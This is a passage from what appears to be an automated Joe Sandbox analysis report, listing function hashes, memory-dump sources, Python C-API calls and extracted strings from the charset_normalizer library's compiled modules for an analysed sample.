                                                                                                                                                                                                                                                                                                  • Opcode ID: 35793672486907f85f78470f91632de72c2c77bd04ed6848e52fa048c16991bf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9f526604d0e2294b571b15cde73271ddb6799066665206f2c2a60bdce3eb84a9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35793672486907f85f78470f91632de72c2c77bd04ed6848e52fa048c16991bf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D114C72B15B058AEB00CF74EC652B873A4FB1A758F442D35DE6D467A4DF38D1988380
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1835891032.00007FFBAB5F1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFBAB5F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1835837141.00007FFBAB5F0000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1835936380.00007FFBAB5F6000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1835980235.00007FFBAB5FB000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab5f0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d49ed3bee8b21f933c9e5f54e2e145c34417feb77aa4e27fc9b7b99f58e227b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44111862B15B018AEB018F70E8642B873A8FB19758F444E35DE6D467A5EF78E19C8340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_$ArgsCallDeallocErr_InstanceObject
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 469999563-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 735d7802508a943567c1b886ab3bcdb7dadecb2b687cb30f547209437c5526d2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 47268cc505506799c18709180954d91fb854cc8aa88c00e24bd6aefac4b8eeb4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 735d7802508a943567c1b886ab3bcdb7dadecb2b687cb30f547209437c5526d2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F0CDB1A5AA0281EA964B7AED54279E2B1AF44BD1F04E034CD6D06774DE3CD4908700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_Unicode_
                                                                                                                                                                                                                                                                                                  • String ID: gfffffff
                                                                                                                                                                                                                                                                                                  • API String ID: 3285369508-1523873471
                                                                                                                                                                                                                                                                                                  • Opcode ID: 01e85d9c1bd3d17e433c8fb88ec89fd76347e07627257ce4696b6525bbbdcfea
                                                                                                                                                                                                                                                                                                  • Instruction ID: 50bac6ab4aede6a4e947db691c4b986fc45b3cc24432aa068aba13bedf51bea6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01e85d9c1bd3d17e433c8fb88ec89fd76347e07627257ce4696b6525bbbdcfea
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6412BE2B0D78582EB018B2AEC113B9ABA0EB617D0F446134DE6E477A5DE3CE541C741
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PyType_IsSubtype.PYTHON312 ref: 00007FFBAB6A93EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAB6A3880: PyThreadState_Get.PYTHON312 ref: 00007FFBAB6A38A2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAB6A3880: PyErr_Fetch.PYTHON312 ref: 00007FFBAB6A38BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAB6A3880: PyCode_NewEmpty.PYTHON312 ref: 00007FFBAB6A38CD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAB6A3880: PyFrame_New.PYTHON312 ref: 00007FFBAB6A38E7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAB6A3880: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3902
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAB6A3880: _PyErr_ChainExceptions1.PYTHON312 ref: 00007FFBAB6A390D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_$ChainCode_DeallocEmptyExceptions1FetchFormatFrame_State_SubtypeThreadType_
                                                                                                                                                                                                                                                                                                  • String ID: charset_normalizer.md.MessDetectorPlugin$reset
                                                                                                                                                                                                                                                                                                  • API String ID: 2783664582-4122180197
                                                                                                                                                                                                                                                                                                  • Opcode ID: 76f6fa13b8723754b9a60dd584603b75876082391e851e7e34e3c089995dae12
                                                                                                                                                                                                                                                                                                  • Instruction ID: d3f65f2a82077893dd9cc1450bcf213bd1fe1161e34d4fc861cf16fe58adc555
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76f6fa13b8723754b9a60dd584603b75876082391e851e7e34e3c089995dae12
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E50129E1A4A50641EE1A9BBEEC511B5E2B5AF45BC0B98E03ACD2D473B1DE2CE551C310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocImportImport_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 187899110-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: d69bcf240f74489f4bd497fc0b8f2cc414bf2c6a77f5002b559556706f64d9ad
                                                                                                                                                                                                                                                                                                  • Instruction ID: 49f27026276e07d5a1a41752aa2f48a9da367d3e46126dcac61276b224847e94
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d69bcf240f74489f4bd497fc0b8f2cc414bf2c6a77f5002b559556706f64d9ad
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E01FAF6A9BA1281EA1B9BADEC50179E3B1BF84B90B44E434CD2E13670DF2DA5458700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_Item
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 1953171116-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: d0256b5094a83c2cce43499a17dbe8ec4dca85f9fba9f3344b29a1cf4ce49e16
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6113cca0d628b880af22ced7ab1dc6baeb79c198a20795d321f999102173570b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0256b5094a83c2cce43499a17dbe8ec4dca85f9fba9f3344b29a1cf4ce49e16
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1701E9E2E9BA0691EA039BBDDC50678A3B0BF44B90F44E435CD2D072B1DE3DE5418300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Err_FromUnicode_
                                                                                                                                                                                                                                                                                                  • String ID: no such name
                                                                                                                                                                                                                                                                                                  • API String ID: 3678473424-4211486178
                                                                                                                                                                                                                                                                                                  • Opcode ID: 486a057b87cc78e3bf1f4718cf85fd2ddf776dd4b60ee12a49ea37b0645cc7c2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 900458994d3c68fb378dcb83d384998e0872191f28fe664bca242bc12725a5b6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 486a057b87cc78e3bf1f4718cf85fd2ddf776dd4b60ee12a49ea37b0645cc7c2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29012CB1A1A642C6FB629B31E8517B963A8BF98F95F440071EE4E46750EF3CE0068721
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted$bool
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-604167972
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac644141ed3b2b58a54269ac7f12803c92ba12a31de27c18b76ada4abe042d6a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F03AA5F47A4281DD06977DECA01A4A370BB54754B94A235CD3C462F1EE1CE49A8700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted$bool
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-232606992
                                                                                                                                                                                                                                                                                                  • Opcode ID: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 23b21e2db2c5efd89b80343f6d1c12867c32c87d555ed97b286fcb0d14599674
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F03AA5F4BA0280DE06977DDCA01A4A371AB54750B94A235C92C422B1EE1CE49A8700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                                                  • String ID: ratio
                                                                                                                                                                                                                                                                                                  • API String ID: 1069087923-4234197119
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c89ac311a2ce402f20b6d1874c9c6560cf7577fd0d47088c9866153395a3948d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0F0A9A5E4BA0680EE1B6BBDEC14275A3B4AF44B94F04F475CD2D062B5DE6CA0818740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                                                  • String ID: feed
                                                                                                                                                                                                                                                                                                  • API String ID: 1069087923-591414443
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b820fe15edd7a11dd26e5b50c71ffaaa8b3f37301721c5fd324880993b90a8a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F0DAE5E5B60680FE176BBDEC65274A3B0AF58B90F04B039CD2D063B9DE2DE1458740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                                                  • String ID: eligible
                                                                                                                                                                                                                                                                                                  • API String ID: 1069087923-1278981203
                                                                                                                                                                                                                                                                                                  • Opcode ID: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
                                                                                                                                                                                                                                                                                                  • Instruction ID: a92b151118e483f7d3bffdfad6f9d5d0bcdc629f32fc2edb2860311efa71bb56
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0DAE9E4B60680FE166BBDEC58674A3B0AF59B90F04B439CC2D063B5DE7CE4818700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted$bool
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2595685569
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
                                                                                                                                                                                                                                                                                                  • Instruction ID: b3f439956b1b900581caef0c7ff3c415a9a1500ab87d3cfe6896bb9beb83cb78
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F03AA5E4790280DD06977DDCA0164A770BB54750BA8A235C92C422B1EE1CE59AC300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_frenzy_symbol_in_word' cannot be deleted$bool
